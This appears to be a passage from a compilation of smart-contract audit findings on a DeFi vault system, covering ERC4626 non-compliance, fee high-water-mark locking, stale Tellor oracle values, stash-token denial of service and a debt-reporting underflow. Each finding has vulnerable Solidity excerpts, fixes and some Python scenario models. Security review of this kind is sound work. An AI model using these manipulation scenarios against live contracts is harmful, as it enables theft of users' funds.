WithdrawInfo({\\n currentIdle: idle,\\n assetsFromIdle: assets >= idle ? idle : assets,\\n totalAssetsToPull: assets - (assets >= idle ? idle : assets),\\n totalAssetsPulled: 0,\\n idleIncrease: 0,\\n debtDecrease: 0\\n });\\n\\n // If not enough funds in idle, then pull what we need from destinations\\n if (info.totalAssetsToPull > 0) {\\n uint256 totalVaultShares = totalSupply();\\n\\n // Using pre-set withdrawalQueue for withdrawal order to help minimize user gas\\n uint256 withdrawalQueueLength = withdrawalQueue.length;\\n for (uint256 i = 0; i < withdrawalQueueLength; ++i) {\\n IDestinationVault destVault = IDestinationVault(withdrawalQueue[i]);\\n (uint256 sharesToBurn, uint256 totalDebtBurn) = _calcUserWithdrawSharesToBurn(\\n destVault,\\n shares,\\n info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled),\\n totalVaultShares\\n );\\n..SNIP..\\n // At this point should have all the funds we need sitting in in the vault\\n uint256 returnedAssets = info.assetsFromIdle + info.totalAssetsPulled;\\n```\\n
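The gap between preview and actual can be seen with a toy model. The sketch below (illustrative Python, not Tokemak's code; all numbers are made up) prices shares off cached values the way `previewRedeem` does, then caps the pull the way `_withdraw` does when a destination vault sits at a loss.

```python
def preview_redeem(shares, total_idle, total_debt, total_supply):
    # ERC4626-style share pricing on cached values (rounding down).
    return shares * (total_idle + total_debt) // total_supply

def withdraw_from_dv(assets_wanted, user_shares, total_supply,
                     dv_debt_value, dv_debt_basis):
    # If the DV sits at a loss, the user may only pull a pro-rata slice.
    if dv_debt_value < dv_debt_basis:
        dv_debt_value = dv_debt_value * user_shares // total_supply
    return min(assets_wanted, dv_debt_value)

total_supply = 100
user_shares = 10
cached_idle, cached_debt = 0, 100   # cached state: 1 asset per share

preview = preview_redeem(user_shares, cached_idle, cached_debt, total_supply)  # 10

# On-chain, the DV has since lost value: debt basis 100, current value 80.
actual = withdraw_from_dv(preview, user_shares, total_supply,
                          dv_debt_value=80, dv_debt_basis=100)  # 8
```

Here `actual < preview`, which is exactly the $asset_{preview} > asset_{actual}$ case the ERC4626 specification forbids.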
Ensure that $asset_{preview} \\le asset_{actual}$.\\nAlternatively, document that the `previewRedeem` and `redeem` functions deviate from the ERC4626 specification in the comments and/or documentation.
It was understood from the protocol team that they anticipate external parties to integrate directly with the LMPVault (e.g., vault shares as collateral). Thus, the LMPVault must be ERC4626 compliance. Otherwise, the caller (internal or external) of the `previewRedeem` function might receive incorrect information, leading to the wrong action being executed.
```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets = previewRedeem(shares); // @audit-info round down, which is correct because user won't get too many\\n\\n assets = _withdraw(possibleAssets, shares, receiver, owner);\\n }\\n```\\n
Malicious users could lock in the NAV/Share of the DV to cause the loss of fees
medium
The `_collectFees` function only collects fees whenever the NAV/Share exceeds the last NAV/Share.\\nDuring initialization, the `navPerShareHighMark` is set to `1`, effectively `1` ETH per share (1:1 ratio). Assume the following:\\nIt is at the early stage, and only a few shares (0.5 shares) were minted in the LMPVault\\nThere is a sudden increase in the price of an LP token in a certain DV (Temporarily)\\n`performanceFeeBps` is 10%\\nIn this case, the debt value of DV's shares will increase, which will cause LMPVault's debt to increase. This event caused the `currentNavPerShare` to increase to `1.4` temporarily.\\nSomeone calls the permissionless `updateDebtReporting` function. Thus, the profit will be `0.4 ETH * 0.5 Shares = 0.2 ETH`, which is small due to the number of shares (0.5 shares) in the LMPVault at this point. The fee will be `0.02 ETH` (~40 USD). Thus, the fee earned is very little and almost negligible.\\nAt the end of the function, the `navPerShareHighMark` will be set to `1.4`, and the highest NAV/Share will be locked forever. After some time, the price of the LP tokens fell back to its expected price range, and the `currentNavPerShare` fell to around `1.05`. No fee will be collected from this point onwards unless the NAV/Share is raised above `1.4`.\\nIt might take a long time to reach the `1.4` threshold, or in the worst case, the spike is temporary, and it will never reach `1.4` again. So, while the NAV/Share of the LMPVault rises from 1.0 to `1.4`, the protocol only collects `0.02 ETH` (~40 USD), which is too little.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\n
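The scenario's arithmetic can be replayed directly. The sketch below is an illustrative Python model of the high-water-mark logic (not the contract itself): a spike to 1.4 with only 0.5 shares outstanding yields a 0.02 ETH fee, and once the mark is locked at 1.4, a later organic rise to 1.39 with far more capital in the vault yields nothing.

```python
MAX_FEE_BPS = 10_000

def collect_fees(nav_per_share, high_mark, total_supply, fee_bps):
    # Returns (fee_in_eth, new_high_mark); fees only accrue above the mark.
    if nav_per_share <= high_mark:
        return 0.0, high_mark
    profit = (nav_per_share - high_mark) * total_supply
    return profit * fee_bps / MAX_FEE_BPS, nav_per_share

# Spike: NAV/share 1.0 -> 1.4 with only 0.5 shares minted, 10% fee.
fee, mark = collect_fees(1.4, 1.0, 0.5, 1_000)    # fee = 0.02 ETH, mark = 1.4

# Price reverts; NAV later climbs organically to 1.39 -- no fee at all,
# regardless of how large total supply has grown in the meantime.
fee2, mark2 = collect_fees(1.39, mark, 1_000.0, 1_000)
```

The attacker's cost is one call to the permissionless `updateDebtReporting` at the top of the spike, while the protocol forfeits all fees below the locked mark.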
Consider implementing a sophisticated off-chain algorithm to determine the right time to lock the `navPerShareHighMark` and/or restrict access to the `updateDebtReporting` function to only protocol-owned addresses.
Loss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.
```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\n
Malicious users could use back old values
medium
Per the Tellor User Checklist, it is possible that a potential attacker could go back in time to find a desired value in the event that a Tellor value is disputed. Following is the extract taken from the checklist:\\nEnsure that functions do not use old Tellor values\\nIn the event where a Tellor value is disputed, the disputed value is removed & previous values remain. Prevent potential attackers from going back in time to find a desired value with a check in your contracts. This repo is a great reference for integrating Tellor.\\nThe current implementation lacks measures to guard against such an attack.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n\\nAnyone can submit a dispute to Tellor by paying a fee. The disputed values are immediately removed upon submission, and the previous values will remain. The attacks are profitable as long as the economic gains are higher than the dispute fee. For instance, this can be achieved by holding large amounts of vault shares (e.g., obtained using own funds or flash-loan) to amplify the gain before manipulating the assets within it to increase the values.
Update the affected function as per the recommendation in the Tellor User Checklist.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n \\n// Add the line below\\n if (timestampRetrieved > lastStoredTimestamps[tellorInfo.queryId]) {\\n// Add the line below\\n lastStoredTimestamps[tellorInfo.queryId] = timestampRetrieved;\\n// Add the line below\\n lastStoredPrices[tellorInfo.queryId] = value;\\n// Add the line below\\n } else {\\n// Add the line below\\n value = lastStoredPrices[tellorInfo.queryId];\\n// Add the line below\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\n
Malicious users could manipulate the price returned by the oracle to be higher or lower than expected. The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.
```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n
Incorrect handling of Stash Tokens within the `ConvexRewardsAdapter._claimRewards()`
medium
The primary task of the `ConvexRewardAdapter._claimRewards()` function revolves around claiming rewards for Convex/Aura staked LP tokens.\\n```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a "balanceOf()"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert RewardAdapter.ClaimRewardsFailed();\\n }\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for "stash tokens"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n\\nAn intriguing aspect of this function's logic lies in its management of "stash tokens" from AURA staking. The check to identify whether `rewardToken[i]` is a stash token involves attempting to invoke `IERC20(rewardTokens[i]).totalSupply()`. If the returned total supply value is `0`, the implementation assumes the token is a stash token and bypasses it. However, this check is flawed since the total supply of stash tokens can indeed be non-zero. For instance, at this address, the stash token has `totalSupply = 150467818494283559126567`, which is definitely not zero.\\nThis misstep in checking can potentially lead to a Denial-of-Service (DOS) situation when calling the `claimRewards()` function. This stems from the erroneous attempt to call the `balanceOf` function on stash tokens, which lack the `balanceOf()` method. Consequently, such incorrect calls might prevent the destination vault from claiming rewards from AURA, resulting in protocol losses.
To accurately determine whether a token is a stash token, it is advised to perform a low-level `balanceOf()` call to the token and subsequently validate the call's success.
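The difference between the flawed heuristic and the recommended call-success check can be sketched with Python stand-ins (a loose analogy: an `AttributeError` here plays the role of a reverting low-level call; all classes and numbers are hypothetical).

```python
class NormalToken:
    def total_supply(self): return 0       # a fresh token can have zero supply
    def balance_of(self, who): return 42

class StashToken:
    def total_supply(self): return 150_467  # non-zero: defeats the old heuristic
    # no balance_of() -- calling it would revert on-chain

def safe_balance_of(token, who):
    # Analogue of a low-level balanceOf() call plus a success check:
    # classify the token by whether the call itself succeeds.
    try:
        return True, token.balance_of(who)
    except AttributeError:
        return False, 0

# Old heuristic misclassifies both tokens:
old_check_says_stash = StashToken().total_supply() == 0   # False (missed)

# Call-success check classifies both correctly:
ok_normal, bal = safe_balance_of(NormalToken(), "vault")  # (True, 42)
ok_stash, _ = safe_balance_of(StashToken(), "vault")      # (False, 0)
```

The `totalSupply()` heuristic fails in both directions: a real reward token with zero supply is skipped, and a stash token with non-zero supply triggers the reverting `balanceOf` call.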
The `AuraRewardsAdapter.claimRewards()` function could suffer from a Denial-of-Service (DOS) scenario.\\nThe destination vault's ability to claim rewards from AURA staking might be hampered, leading to protocol losses.
```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a "balanceOf()"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert RewardAdapter.ClaimRewardsFailed();\\n }\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for "stash tokens"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n
`navPerShareHighMark` not reset to 1.0
medium
The LMPVault will only collect fees if the current NAV (currentNavPerShare) is more than the last NAV (effectiveNavPerShareHighMark).\\n```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n\\nAssume the current LMPVault state is as follows:\\ntotalAssets = 15 WETH\\ntotalSupply = 10 shares\\nNAV/share = 1.5\\neffectiveNavPerShareHighMark = 1.5\\nAlice owned all the remaining shares in the vault, and she decided to withdraw all her 10 shares. As a result, the `totalAssets` and `totalSupply` become zero. It was found that when all the shares have been exited, the `effectiveNavPerShareHighMark` is not automatically reset to 1.0.\\nAssume that at some point later, other users started to deposit into the LMPVault, and the vault invests the deposited WETH to profitable destination vaults, resulting in the real/actual NAV rising from 1.0 to 1.49 over a period of time.\\nThe system is designed to collect fees when there is a rise in NAV due to profitable investment from sound rebalancing strategies. However, since the `effectiveNavPerShareHighMark` has been set to 1.5 previously, no fee is collected when the NAV rises from 1.0 to 1.49, resulting in a loss of fee.
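A small state model makes the lost-fee window concrete. This is an illustrative Python sketch (simplified from the described logic; names and the 10% fee rate are assumptions), contrasting the buggy full exit with the proposed reset.

```python
class Vault:
    def __init__(self):
        self.high_mark = 1.0
        self.total_supply = 0.0

    def deposit(self, shares):
        self.total_supply += shares

    def withdraw_all(self, reset_mark=False):
        self.total_supply = 0.0
        if reset_mark:              # the proposed fix
            self.high_mark = 1.0

    def collect_fees(self, nav_per_share, fee_rate=0.1):
        if self.total_supply == 0 or nav_per_share <= self.high_mark:
            return 0.0
        fee = (nav_per_share - self.high_mark) * self.total_supply * fee_rate
        self.high_mark = nav_per_share
        return fee

v = Vault()
v.deposit(10); v.collect_fees(1.5)   # mark climbs to 1.5
v.withdraw_all()                     # bug: mark stays at 1.5 after full exit
v.deposit(10)
missed = v.collect_fees(1.49)        # 0.0 -- no fee despite real profit

v2 = Vault()
v2.deposit(10); v2.collect_fees(1.5)
v2.withdraw_all(reset_mark=True)     # fix: mark resets to 1.0
v2.deposit(10)
captured = v2.collect_fees(1.49)     # fee accrues for the new depositor cohort
```
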
Consider resetting the `navPerShareHighMark` to 1.0 whenever a vault has been fully exited.\\n```\\nfunction _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n) internal virtual returns (uint256) {\\n..SNIP..\\n _burn(owner, shares);\\n \\n// Add the line below\\n if (totalSupply() == 0) navPerShareHighMark = MAX_FEE_BPS;\\n\\n emit Withdraw(msg.sender, receiver, owner, returnedAssets, shares);\\n\\n _baseAsset.safeTransfer(receiver, returnedAssets);\\n\\n return returnedAssets;\\n}\\n```\\n
Loss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.
```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n
Vault cannot be added back into the vault registry
medium
When removing a vault from the registry, all state related to the vault, such as `_vaults`, `_assets`, and `_vaultsByAsset`, is cleared, except for the `_vaultsByType` state.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, "vaultAddress");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n\\nThe uncleared `_vaultsByType` state will cause the `addVault` function to revert when trying to add the vault back into the registry, even though the vault no longer exists in the registry.\\n```\\n if (!_vaultsByType[vaultType].add(vaultAddress)) revert VaultAlreadyExists(vaultAddress);\\n```\\n
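The stale-index behavior reduces to a few set operations. The sketch below is a minimal Python model of the registry (not the Solidity code; vault address and type are placeholders), showing the re-add reverting and the fix clearing the type index.

```python
vaults = set()
vaults_by_type = {}

def add_vault(vault, vtype):
    # Mirrors addVault: membership in the per-type index causes a revert.
    if vault in vaults_by_type.setdefault(vtype, set()):
        raise RuntimeError("VaultAlreadyExists")
    vaults.add(vault)
    vaults_by_type[vtype].add(vault)

def remove_vault(vault, vtype, fixed=False):
    vaults.discard(vault)
    if fixed:                       # the proposed fix: clear _vaultsByType too
        vaults_by_type[vtype].discard(vault)

add_vault("0xVault", "LST")
remove_vault("0xVault", "LST")      # bug: type index still holds the vault
try:
    add_vault("0xVault", "LST")     # reverts despite the vault being gone
    readd_ok = True
except RuntimeError:
    readd_ok = False

remove_vault("0xVault", "LST", fixed=True)  # with the fix applied...
add_vault("0xVault", "LST")                 # ...the re-add now succeeds
```
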
Clear the `_vaultsByType` state when removing the vault from the registry.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, "vaultAddress");\\n// Add the line below\\n ILMPVault vault = ILMPVault(vaultAddress);\\n// Add the line below\\n bytes32 vaultType = vault.vaultType();\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n// Add the line below\\n if (!_vaultsByType[vaultType].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n
The `addVault` function is broken in the edge case when the updater tries to add the vault back into the registry after removing it. It affects all the operations of the protocol that rely on the vault registry.
```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, "vaultAddress");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n
LMPVault.updateDebtReporting could underflow because of subtraction before addition
medium
`debt = totalDebt - prevNTotalDebt + afterNTotalDebt` where prevNTotalDebt equals `(destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1)` and the key to finding a scenario for underflow starts by noting that each value deducted from totalDebt is calculated as `cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up)`\\nLMPDebt\\n```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n\\nLet: `totalDebt = destInfo.currentDebt = destInfo.debtBasis = cachedCurrentDebt = cachedDebtBasis = 11` `totalSupply = destInfo.ownedShares = cachedDvShares = 10`\\nThat way: `cachedCurrentDebt * 1 / cachedDvShares = 1.1` but totalDebtBurn would be rounded up to 2\\n`sharesToBurn` could easily be 1 if there was a loss that changes the ratio from `1:1.1` to `1:1`. Therefore `currentDvDebtValue = 10 * 1 = 10`\\n```\\nif (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n}\\n\\n// Shouldn't pull more than we want\\n// Or, we're not in profit so we limit the pull\\nif (currentDvDebtValue < maxAssetsToPull) {\\n maxAssetsToPull = currentDvDebtValue;\\n}\\n\\n// Calculate the portion of shares to burn based on the assets we need to pull\\n// and the current total debt value. These are destination vault shares.\\nsharesToBurn = currentDvShares.mulDiv(maxAssetsToPull, currentDvDebtValue, Math.Rounding.Up);\\n```\\n\\nSteps\\ncall redeem for 1 share; previewRedeem requests 1 as `maxAssetsToPull`\\n2 debt would be burned\\nTherefore totalDebt = 11 - 2 = 9\\ncall redeem for another 1 share, requesting another 1 `maxAssetsToPull`\\n2 debt would be burned again, and\\ntotalDebt would be 7, but prevNTotalDebt = 11 * 8 // 10 = 8\\nThe values 1, 10, and 11 are used for illustration, and the underflow could occur in several other ways. E.g., if we had used `100,001`, `1,000,010`, and `1,000,011` respectively.
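The steps above can be replayed in a pure-Python model (illustrative, using the report's own numbers): round-up burns drain `totalDebt` faster than the pro-rata snapshot `prevNTotalDebt` shrinks, so the subtraction underflows before the addition can compensate.

```python
def mul_div_up(a, b, c):
    # ceil(a * b / c) for non-negative integers, like mulDiv(..., Rounding.Up).
    return -(-(a * b) // c)

total_debt = 11
owned_shares = 10
current_debt_snapshot = 11   # destInfo.currentDebt, cached

# Two redemptions of 1 share each; each burns ceil(11 * 1 / 10) = 2 debt.
for _ in range(2):
    total_debt -= mul_div_up(current_debt_snapshot, 1, owned_shares)
# total_debt is now 7, but 8 shares remain priced off the stale snapshot:
prev_n_total_debt = current_debt_snapshot * 8 // owned_shares   # 11*8//10 = 8

# Solidity evaluates `totalDebt - prevNTotalDebt` first and reverts here.
underflows = total_debt < prev_n_total_debt
```

Reordering to `totalDebt + afterNTotalDebt - prevNTotalDebt`, as recommended, avoids the intermediate negative value.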
Add before subtracting. ETH in circulation is not enough to cause an overflow.\\n```\\n- debt = totalDebt - prevNTotalDebt + afterNTotalDebt\\n+ debt = totalDebt + afterNTotalDebt - prevNTotalDebt\\n```\\n
_updateDebtReporting could underflow and break a critical piece of core protocol functionality. updateDebtReporting is so critical that funds could be lost if it doesn't work. Funds could be lost both when the vault is in profit and when it is at a loss.\\nIf in profit, users would want to call updateDebtReporting so that they get more assets for their shares (based on the profit).\\nIf at a loss, the vault's entire assets are locked and withdrawals won't succeed, because the Net Asset Value is not supposed to decrease through such an action (the noNavDecrease modifier). The Net Asset Value has decreased because the loss reduces totalDebt, but the only way to update the totalDebt record is by calling updateDebtReporting. Those impacted the most are those with large funds: the bigger the fund, the more the NAV would decrease on withdrawal.
```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n
LMPVault: DoS when `feeSink` balance hits `perWalletLimit`
medium
